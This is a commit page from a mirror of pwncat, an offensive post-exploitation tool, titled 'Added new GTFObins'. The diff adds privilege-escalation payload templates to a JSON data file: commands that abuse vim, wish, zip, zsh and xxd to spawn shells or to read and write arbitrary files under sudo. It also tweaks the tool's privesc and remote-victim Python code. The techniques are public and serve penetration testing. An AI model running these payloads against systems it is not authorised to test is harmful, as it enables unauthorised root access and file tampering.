Saverr/pwncat
1
0
Fork 0
mirror of https://github.com/calebstewart/pwncat.git synced 2024-11-30 20:34:15 +01:00
Code Projects Releases Wiki Activity

Added new GTFObins

Browse Source
This commit is contained in:
John Hammond 2020-05-23 03:06:19 -04:00
parent 76f83ea076
commit 72b83c88b2
6 changed files with 119 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

99
data/gtfobins.json
View File

@ -874,8 +874,52 @@
//-------------------------------------------------------------------
"vim": [
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "':!{shell}'", "-c", "'quit'"],
// Include an extra newline to be sure to exit vim itself.
"exit": "exit\n\n"
},
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "':py import os; os.execl(\"{shell}\", \"{shell}\", \"-c\", \"reset; exec {shell}\")'", "-c", "'quit'"]
},
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "':py3 import os; os.execl(\"{shell}\", \"{shell}\", \"-c\", \"reset; exec {shell}\")'", "-c", "'quit'"]
},
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "':lua os.execute(\"reset; exec {shell}\")'", "-c", "'quit'"]
},
{
"type": "read",
"stream": "print",
"payload": "{command}",
"args": ["-es" ,"'+%print'" ,"'+:q!'", "{lfile}"]
},
{
"type": "write",
"stream": "print",
"payload": "{command} >/dev/null",
"args": ["-es" ,"'+%print'" ,"'+:w! {lfile}'", "'+:q!'", "/dev/stdin"]
}
// Vim can PROBABLY file write... but I have not figured that out just yet.
],
//-------------------------------------------------------------------
"wish": [
{
"type": "shell",
"payload": "TF=none; {command} -h 2>/dev/null 1>&2; TF=$({mktemp}); echo 'exec {shell} <@stdin >@stdout 2>@stderr; exit' > $TF; {command}",
"args": ["$TF"]
}
],
//------------------------------------------------------------------- //-------------------------------------------------------------------
"xargs": [ "xargs": [
{ {
@ -890,5 +934,56 @@
"payload": "{command}", "payload": "{command}",
"args": ["-a", "{lfile}", "-0"] "args": ["-a", "{lfile}", "-0"]
} }
],
//-------------------------------------------------------------------
"xxd": [
{
"type": "read",
"stream": "raw",
"payload": "{command} {lfile} | {command} -r ",
"args": []
},
// This has the same issue of not sending the right length of the file.
{
"type": "write",
"stream": "raw",
"payload": "{xxd} -l {length} | {command}",
"args": ["-r", "-", "{lfile}"]
}
],
//-------------------------------------------------------------------
// `yum` should be added.
// https://gtfobins.github.io/gtfobins/yum/
//-------------------------------------------------------------------
"zip": [
{
"type": "shell",
"payload": "TF=none; {command} --help >/dev/null; TF=$({mktemp} -u); {command} $TF /etc/hosts -T -TT '{shell} #'",
"args": []
}
],
//-------------------------------------------------------------------
"zsh": [
{
"type": "shell",
"payload": "{command}",
"args": ["-c", "\"{shell} -p\""]
}
] ]
//-------------------------------------------------------------------
// zsoelim was not yet tested because it might do strange things to the data
// https://gtfobins.github.io/gtfobins/zsoelim/
//
//-------------------------------------------------------------------
// zypper requires the modification of an environment variable.
// We don't handle this well in pwncat for sudo.
// https://gtfobins.github.io/gtfobins/zypper/
// "zypper": [
// {
// "type": "shell",
// "payload": "TF=none; {command} 2>/dev/null; TF=$({mktemp} -d); cp {shell} $TF/zypper-x; export PATH=$TF:$PATH; {command} x",
// "args": [],
// "exit": "exit\n"
// }
// ]
} }

6
pwncat/__main__.py
View File

@ -6,6 +6,12 @@ import socket
import sys import sys
from sqlalchemy.exc import InvalidRequestError from sqlalchemy.exc import InvalidRequestError
import warnings
from sqlalchemy import exc as sa_exc
# Ignore SQL Alchemy warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=sa_exc.SAWarning)
import pwncat import pwncat
from pwncat.remote import Victim from pwncat.remote import Victim

4
pwncat/file.py
View File

@ -54,6 +54,7 @@ class RemoteBinaryPipe(RawIOBase):
# output of the user's terminal # output of the user's terminal
def close(self): def close(self):
if self.eof: if self.eof:
return return
@ -128,13 +129,16 @@ class RemoteBinaryPipe(RawIOBase):
pass pass
def write(self, data: bytes): def write(self, data: bytes):
if self.eof: if self.eof:
return None return None
try: try:
n = self.pty.client.send(data) n = self.pty.client.send(data)
except (socket.timeout, BlockingIOError): except (socket.timeout, BlockingIOError):
n = 0 n = 0
if n == 0: if n == 0:
return None return None
self.count += n self.count += n
return n return n

5
pwncat/privesc/__init__.py
View File

@ -3,7 +3,7 @@ from typing import Type, List, Tuple, Optional
from prompt_toolkit.shortcuts import confirm from prompt_toolkit.shortcuts import confirm
from colorama import Fore from colorama import Fore
import crypt import crypt
from time import sleep import time
import socket import socket
from pprint import pprint from pprint import pprint
import re import re
@ -278,9 +278,10 @@ class Finder:
try: try:
# Attempt our basic, known technique # Attempt our basic, known technique
exit_script = technique.method.execute(technique) exit_script = technique.method.execute(technique)
pwncat.victim.flush_output() pwncat.victim.flush_output(some=True)
# Reset the terminal to ensure we are stable # Reset the terminal to ensure we are stable
time.sleep(0.1)
pwncat.victim.reset() pwncat.victim.reset()
# Check that we actually succeeded # Check that we actually succeeded

7
pwncat/privesc/sudo.py
View File

@ -2,7 +2,7 @@
from typing import Generator, List, BinaryIO from typing import Generator, List, BinaryIO
import shlex import shlex
import sys import sys
from time import sleep import time
import os import os
from colorama import Fore, Style from colorama import Fore, Style
import socket import socket
@ -254,6 +254,8 @@ class SudoMethod(Method):
method, sudo_spec, need_password = technique.ident method, sudo_spec, need_password = technique.ident
# Build the payload # Build the payload
# The data size is WRONG for encoded payloads!!!
# ... but I guess this not applicable for `raw` streams..?
payload, input_data, exit_command = method.build( payload, input_data, exit_command = method.build(
lfile=filepath, spec=sudo_spec, user=technique.user, length=len(data) lfile=filepath, spec=sudo_spec, user=technique.user, length=len(data)
) )
@ -270,12 +272,11 @@ class SudoMethod(Method):
exit_cmd=exit_command.encode("utf-8"), exit_cmd=exit_command.encode("utf-8"),
) )
with method.wrap_stream(pipe) as pipe:
# Send the input data required to initiate the transfer # Send the input data required to initiate the transfer
if len(input_data) > 0: if len(input_data) > 0:
pipe.write(input_data.encode("utf-8")) pipe.write(input_data.encode("utf-8"))
with method.wrap_stream(pipe) as pipe:
pipe.write(data) pipe.write(data)
def get_name(self, tech: Technique): def get_name(self, tech: Technique):

2
pwncat/remote/victim.py
View File

@ -1328,6 +1328,8 @@ class Victim:
output = b"" output = b""
old_timeout = self.client.gettimeout() old_timeout = self.client.gettimeout()
self.client.settimeout(0) self.client.settimeout(0)
# self.client.send(b"echo\n")
# some = True
while True: while True:
try: try: